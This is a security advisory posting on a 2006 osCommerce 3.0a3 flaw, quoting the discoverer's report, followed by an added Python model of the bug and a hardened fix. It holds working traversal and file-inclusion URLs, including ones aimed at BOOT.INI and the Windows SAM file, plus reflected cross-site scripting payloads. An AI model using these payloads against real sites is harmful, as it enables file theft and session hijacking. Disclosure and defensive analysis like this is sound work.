Don Posted December 9, 2006

Version(s): 3.0a3

Description: Lostmon reported a vulnerability in osCommerce. A remote user can view files on the target system. A remote user can also conduct cross-site scripting attacks.

The 'admin/templates_boxes_layout.php' script does not properly validate user-supplied input in the 'filter' parameter. A remote user can supply a specially crafted request to view files on the target system.

Some demonstration exploit URLs are provided:

http://[target]/admin/templates_boxes_layout.php?set=boxes&filter=../../our_evil_php_file&lID=27
http://[target]/admin/templates_boxes_layout.php?set=boxes&filter=../../../../file.extension%00

A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the osCommerce software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/oscommerce/admin/modules.php?set=shipping%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://[target]/definitiva/admin/customers.php?selected_box=customers%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://[target]/oscommerce/admin/languages_definitions.php?lID=1%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://[target]/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product

The original advisory is available at:
http://lostmon.blogspot.com/2006/12/oscommerce-traversal-arbitrary-file.html

Impact: A remote user can view files on the target system. A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the osCommerce software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution: No solution was available at the time of this entry.

Vendor URL: http://www.oscommerce.com/

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: Lostmon <lostmon@gmail.com>

Message History: None.

Source Message Contents

Date: Thu, 7 Dec 2006 10:31:42 +0100
From: Lostmon <lostmon@gmail.com>
Subject: Oscommerce 3.0a3 traversal arbitrary file access

############################################
Oscommerce traversal arbitrary file access
Vendor: http://www.oscommerce.com/about/news,125
Advisory: http://lostmon.blogspot.com/2006/12/oscommerce-traversal-arbitrary-file.html
Vendor notify: NO
Exploit available: YES
###########################################

osCommerce contains a flaw that allows remote traversal arbitrary file access. This flaw exists because the application does not validate the filter variable upon submission to the admin/templates_boxes_layout.php script. This could allow a remote authenticated administrator to create a specially crafted URL that would execute '../' directory traversal characters to view files on the target system with the privileges of the target web service.

####################
versions
####################
Oscommerce 3.0a3

###################
SOLUTION
###################
No solution was available at this time.

################
timeline
################
Discovered: 11-11-2006
vendor notify: -----
vendor response: ----
disclosure: 07-12-2006

#################
Examples
#################

######################
traversal file access
######################

When we try to open

http://localhost/oscommerce/admin/templates_boxes_layout.php?set=boxes&filter=[SOME WORD]&lID=27

the application returns a full path disclosure and returns this error:

Warning: require(includes/templates/[SOME WORD].php) [function.require]: failed to open stream: No such file or directory in C:\AppServ\www\oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13

Fatal error: require() [function.require]: Failed opening required 'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear') in C:\AppServ\www\oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13

The application adds the .php extension to our [SOME WORD], ummm, and it searches for the file in a folder inside the webserver. We can include any php file located on the web server in the application and it is executed (local file inclusion):

http://[victim]/admin/templates_boxes_layout.php?set=boxes&filter=../../our_evil_php_file&lID=27

If we try to read a file outside the webserver folder with a non-php extension, we can try this for a test:

...&filter=../../../../file.extension%00

For example, to look for boot.ini on a windows system:

http://localhost/oscommerce/admin/templates_boxes_layout.php?set=boxes&filter=../../../../BOOT.INI%00&lID=27
http://localhost/oscommerce/admin/templates_boxes_layout.php?set=content&filter=../../../../windows/repair/sam%00&lID=27

#####################
Cross site scripting
#####################

http://localhost/oscommerce/admin/modules.php?set=shipping%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://localhost/definitiva/admin/customers.php?selected_box=customers%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://localhost/oscommerce/admin/languages_definitions.php?lID=1%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product

########################
End
#####################

Thanks to Estrella for being my light.

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move..
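The two defects in the advisory, a template name concatenated straight into a require() path and a request parameter reflected raw into an HTML attribute, both come down to missing input handling. The following is an added Python model of the unsafe pattern beside its hardened form, written for this page and not code from the post, from Lostmon, or from osCommerce (which is PHP). The relative directory `includes/templates` is taken from the advisory's error message; the function names, the `app/includes/templates` base directory and the sample payloads are constructed for the example.

```python
import html
import os
import re

# Relative template directory taken from the advisory's require() error message.
TEMPLATE_DIR = "includes/templates"


def vulnerable_template_path(filter_value: str) -> str:
    """Model of the path construction the advisory describes: the untrusted
    'filter' parameter lands in a require() path and '.php' is appended with
    no validation, so '../' segments climb out of TEMPLATE_DIR.

    PHP builds of that era stopped reading a filename at a NUL byte, which is
    why the advisory's '%00' payloads shed the forced '.php' suffix. That
    truncation is imitated here to make the effect visible; it is a model,
    not real PHP behaviour being exercised."""
    path = f"{TEMPLATE_DIR}/{filter_value}.php"
    nul = path.find("\x00")
    return path if nul == -1 else path[:nul]


# Allow-list for template names: a single path segment with no separators,
# dots or control bytes, so neither '../' nor '%00' can ever pass.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def safe_template_path(filter_value: str, base_dir: str) -> str:
    """Hardened replacement (hypothetical helper): accept only an allow-listed
    name, then confirm the resolved file still lies under base_dir as defence
    in depth should the allow-list ever be loosened. Raises ValueError on
    rejection instead of echoing the bad name back in an error message."""
    if SAFE_NAME.fullmatch(filter_value) is None:
        raise ValueError("template name contains disallowed characters")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, filter_value + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("template path escapes the template directory")
    return candidate


def hidden_field(name: str, value: str) -> str:
    """Reflect a request parameter into a double-quoted HTML attribute safely.
    Every XSS payload in the advisory starts with %22%3E ('">'): a raw quote
    closes the attribute and the remainder is parsed as markup. html.escape
    with quote=True converts '&', '<', '>', '"' and "'" to entities first."""
    return (f'<input type="hidden" name="{html.escape(name, quote=True)}" '
            f'value="{html.escape(value, quote=True)}">')


if __name__ == "__main__":
    # Constructed inputs echoing the advisory's payloads.
    print(vulnerable_template_path("../../our_evil_php_file"))
    print(vulnerable_template_path("../../../../BOOT.INI\x00"))
    for name in ("boxes", "../../our_evil_php_file", "../../../../BOOT.INI\x00"):
        try:
            print("accepted:", safe_template_path(name, "app/includes/templates"))
        except ValueError as exc:
            print("rejected:", repr(name), "->", exc)
    print(hidden_field("set", 'shipping"><script>alert(\'xss\')</script>'))
```

The allow-list does the real work: a name that cannot contain a slash, a dot or a NUL cannot traverse or truncate, whatever the interpreter does with NUL bytes. The realpath containment check costs little and keeps the loader safe if someone later widens the pattern. For the reflected parameters, encoding at the point of output is the fix; rejecting `<script` on input is not, since the advisory's `String.fromCharCode` variants show how easily a filter on one spelling is sidestepped.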